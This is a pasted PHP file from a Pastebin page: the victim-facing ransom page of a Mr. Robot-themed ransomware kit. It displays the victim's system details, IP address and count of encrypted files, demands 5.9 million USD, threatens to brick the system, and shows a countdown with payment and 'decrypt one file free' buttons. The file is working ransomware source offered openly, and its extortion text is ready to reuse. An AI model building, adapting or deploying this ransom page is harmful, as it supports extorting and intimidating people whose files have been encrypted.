FlyFar

pages/index.php

Sep 2nd, 2023 (edited)
179
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.08 KB | Cybersecurity | 0 0
  1. <?php
  2. require_once('config/config.php');
  3. $information = get_target();
  4. if($information['id'] == "")
  5. {
  6.     echo "OhOhOh Wait Elliot !";
  7.     exit();
  8. }
  9. $dates = date("m/d/y h:i:s");
  10. $datef = $information['date_time'];
  11.  
  12. $datetime1 = date_create($dates);
  13. $datetime2 = date_create($datef);
  14. $dateDiff = date_diff($datetime1, $datetime2);
  15. ?>
  16. <head>
  17.     <title>Fsociety ransomware like (@graniet)</title>
  18.     <link rel="stylesheet" href="css/styles.css" type="text/css"/>
  19. </head>
  20. <body>
  21. <div id="container">
  22.     <div id="header_ransom">
  23.         <p class="ophello">#OPdailyallowance.</p>
  24.     <p class="ophello">Your files are encrypted.</p>
  25.     <p class="information">
  26.         To get the key to decrypt files, you have to paid <span class="red">5.9 million USD.</span> if payment is not made
  27.         by <span class="red">tommorow night</span> we'll brick your entire system.<br /><br />
  28.         More instructions forthcoming. - fsociety.
  29.         <p class="time">Time left: <span class="red"><?=
  30.         $dateDiff->format('%H'); ?></span>H <span class="red"><?=
  31.         $dateDiff->format('%I'); ?></span>m <span class="red"><?=
  32.         $dateDiff->format('%S'); ?></span>s </span>
  33.     </p>
  34.     <div class="more_information">
  35.         <p class="minfo" style="width:20%">Your system : <span class="red"><?= $information['system_arch']; ?></span></p>
  36.         <p class="minfo" style="width:35%">First connect IP : <span class="red"><?= $information['ip_adress']; ?> flag</span></p>
  37.         <p class="minfo" style="width:40%">Total encrypted : <span
  38.         class="red"><?= $information['nb_file']; ?></span> encrypted files.</p>
  39.     </div>
  40.     </div>
  41.     <div id="menu_ransom">
  42.     <a href="#"><button class="button">Refresh</button></a>
  43.     <button class="button red">Payment</button>
  44.     <button class="button">FAQ</button>
  45.     <button class="button red">Decrypt one file for free</button>
  46.     <button class="button">Support</button>
  47.     </div>
  48.     <div id="jester"></div>
  49.     <div class="diclaimer">
  50.     JΞSTΞR ✪ ΔCTUAL³³º¹ <br /> <br />
  51.     There's an unequal amount of good and bad in most things. The trick is to
  52.     figure out the ratio and act accordingly.
  53.     </div>
  54. </div>
  55. </div>
Tags: index
Add Comment
Please, Sign In to add comment